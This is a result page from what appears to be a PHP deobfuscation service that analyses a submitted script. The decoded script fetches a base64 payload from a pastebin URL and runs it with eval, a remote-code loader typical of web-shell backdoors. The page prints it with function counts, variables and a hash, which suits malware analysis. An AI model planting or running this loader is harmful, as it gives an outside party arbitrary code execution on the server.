Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $qwe = "http://pastebin.com/raw/6DuKx17b"; $qwer = file_get_contents($qwe); e..

Decoded Output download

<?php 
 
$qwe = "http://pastebin.com/raw/6DuKx17b"; 
$qwer  = file_get_contents($qwe);  
eval("?>".(base64_decode($qwer))); 
 
?>

Did this file decode correctly?

Original Code

<?php

$qwe = "http://pastebin.com/raw/6DuKx17b";
$qwer  = file_get_contents($qwe); 
eval("?>".(base64_decode($qwer)));

?>

Function Calls

base64_decode 1
file_get_contents 1

Variables

$qwe http://pastebin.com/raw/6DuKx17b
$qwer

Stats

MD5 416bfc30a5d83111cf1cb56ff44f16ad
Eval Count 1
Decode Time 86 ms